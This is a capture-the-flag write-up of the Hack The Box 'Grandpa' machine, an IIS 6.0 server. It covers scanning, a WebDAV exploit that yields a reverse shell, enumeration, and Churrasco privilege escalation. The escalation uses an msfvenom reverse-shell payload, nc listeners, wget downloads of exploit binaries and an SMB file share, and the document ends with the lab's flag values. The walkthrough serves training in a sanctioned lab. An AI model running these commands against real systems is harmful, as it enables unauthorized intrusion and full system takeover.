Nmap Results
# Nmap 7.92 scan initiated Sat Aug 20 22:37:39 2022 as: nmap -T5 -p80 -A -oA scan-all -Pn 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan:
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Sun, 21 Aug 2022 02:37:51 GMT
| Server Type: Microsoft-IIS/6.0
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 15.02 ms 10.10.14.1
2 15.05 ms 10.10.10.14
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 20 22:37:52 2022 -- 1 IP address (1 host up) scanned in 13.64 seconds
Service Enumeration
TCP/80

Gobuster Enumeration
gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx -t 50 -o gobuster-out -r
/Images (Status: 403) [Size: 218]
/_private (Status: 403) [Size: 1529]
/_vti_cnf (Status: 403) [Size: 1529]
/_vti_log (Status: 403) [Size: 1529]
/_vti_pvt (Status: 403) [Size: 1529]
/_vti_txt (Status: 403) [Size: 1529]
/_vti_inf.html (Status: 200) [Size: 1754]
/_vti_bin (Status: 403) [Size: 218]
/aspnet_client (Status: 403) [Size: 218]
/images (Status: 403) [Size: 218]
WebDAV
Unlike the IIS server on Granny, we aren't allowed to use the PUT
method on this server. I tried multiple bypass exploits to upload a file to the root of the WebDAV directory, but nothing was sticking.
Then, I decided to give this exploit a try:
Exploit
Review the Exploit

In order to run this exploit, we need to pass the following arguments in order:
- Target IP
- Target Port
- Listener IP
- Listener Port
Start a Listener and Catch a Shell
sudo rlwrap nc -lnvp <listener-tcp-port>
python2 iis_reverse_shell.py <target-ip> <target-port> <listener-ip> <listener-port>

Post-Exploit Enumeration
Current User
Click to expand
User Name SID
============================ ========
nt authority\network service S-1-5-20
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================ ================ ============================================== ==================================================
NT AUTHORITY\NETWORK SERVICE User S-1-5-20 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
GRANPA\IIS_WPG Alias S-1-5-21-1709780765-3897210020-3926566182-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
OS & Kernel
Click to expand
Host Name: GRANPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 2 Hours, 0 Minutes, 7 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2293 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 713 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,256 MB
Page File: In Use: 214 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
Users
Click to expand
User accounts for \\GRANPA
-------------------------------------------------------------------------------
Administrator ASPNET Guest
Harry IUSR_GRANPA IWAM_GRANPA
SUPPORT_388945a0
Groups
Click to expand
Aliases for \\GRANPA
-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Distributed COM Users
*Guests
*HelpServicesGroup
*IIS_WPG
*Network Configuration Operators
*OWS_209498277_admin
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users
Network
Interfaces
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.10.10.14
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
ARP Table
N/A
Routes
N/A
Open Ports
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:1027 0.0.0.0:0 LISTENING 404
TCP 0.0.0.0:5859 0.0.0.0:0 LISTENING 4
TCP 10.10.10.14:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING 1936
Ping Sweep
N/A
Processes
Click to expand
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 236 K
smss.exe 272 Console 0 460 K
csrss.exe 320 Console 0 3,344 K
winlogon.exe 344 Console 0 9,736 K
services.exe 392 Console 0 5,180 K
lsass.exe 404 Console 0 7,492 K
svchost.exe 580 Console 0 3,052 K
svchost.exe 668 Console 0 3,708 K
svchost.exe 732 Console 0 4,008 K
svchost.exe 752 Console 0 3,448 K
svchost.exe 788 Console 0 17,784 K
spoolsv.exe 924 Console 0 4,136 K
msdtc.exe 952 Console 0 4,424 K
cisvc.exe 1064 Console 0 2,504 K
svchost.exe 1112 Console 0 2,052 K
inetinfo.exe 1168 Console 0 8,688 K
svchost.exe 1204 Console 0 1,320 K
VGAuthService.exe 1312 Console 0 9,068 K
vmtoolsd.exe 1380 Console 0 14,416 K
svchost.exe 1480 Console 0 5,560 K
svchost.exe 1588 Console 0 3,772 K
dllhost.exe 1764 Console 0 7,084 K
alg.exe 1936 Console 0 2,804 K
wmiprvse.exe 1964 Console 0 9,172 K
wmiprvse.exe 2292 Console 0 5,076 K
w3wp.exe 2420 Console 0 58,752 K
davcdata.exe 2492 Console 0 2,688 K
cidaemon.exe 1100 Console 0 1,232 K
cidaemon.exe 1372 Console 0 1,920 K
cidaemon.exe 1604 Console 0 1,340 K
logon.scr 2964 Console 0 1,504 K
c.exe 3308 Console 0 1,544 K
wmiprvse.exe 3780 Console 0 4,212 K
tasklist.exe 3636 Console 0 3,668 K
Services
Click to expand
These Windows services are started:
Application Experience Lookup Service
Application Layer Gateway Service
Automatic Updates
COM+ Event System
COM+ System Application
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
HTTP SSL
IIS Admin Service
Indexing Service
IPSEC Services
Logical Disk Manager
Network Connections
Network Location Awareness (NLA)
Plug and Play
Print Spooler
Protected Storage
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Terminal Services
VMware Alias Manager and Ticket Service
VMware Tools
Windows Audio
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
World Wide Web Publishing Service
Scheduled Tasks
Click to expand
Unable to enumnerate, access denied.
Privilege Escalation
Windows-Exploit-Suggester
On the target, run the command systeminfo
and copy the output into a file on Kali. Then, check the target's patch level against a list downloaded from Microsoft.
windows-exploit-suggester.py -u
windows-exploit-suggester.py -d 2022-08-21-mssb.xls -i sysinfo.txt -l
The Grandparents
Since Grandpa is the same operating system as the Granny host, I decided to give the Churrasco
exploit another go here. Because the IIS service is being run with a service account, the service account gets SeImpersonate
privileges. Therefore, it is quite easy to steal the SYSTEM
token.
The churrasco.exe
payload makes this easy for us by impersonating SYSTEM
and executing a payload of our choosing.
Running the Exploit
Download the Exploit
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
Generate a Msfvenom Payload
msfvenom -p windows/shell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -f exe -a x86 --platform windows -o privesc.exe
Transfer the Files
Start a SMB Server on Kali
smbserver.py -smb2support evil $PWD
Copy the Files to the Target
Run these commands on the target. This will make a SMB client connection to Kali and copy the files locally to the target.
copy \\kali-vpn-ip\evil\churrasco.exe .
copy \\kali-vpn-ip\evil\privesc.exe .
Start a Listener on Kali and Run the Exploit
sudo rlwrap nc -lnvp <msfvenom-tcp-port>
.\churrasco.exe -d .\privesc.exe

Flags
C:\Documents and Settings\Harry\Desktop\user.txt
bdff5ec67c3cff017f2bedc146a5d869
C:\Documents and Settings\Administrator\Desktop\root.txt
9359e905a2c35f861f6a57cecf28bb7b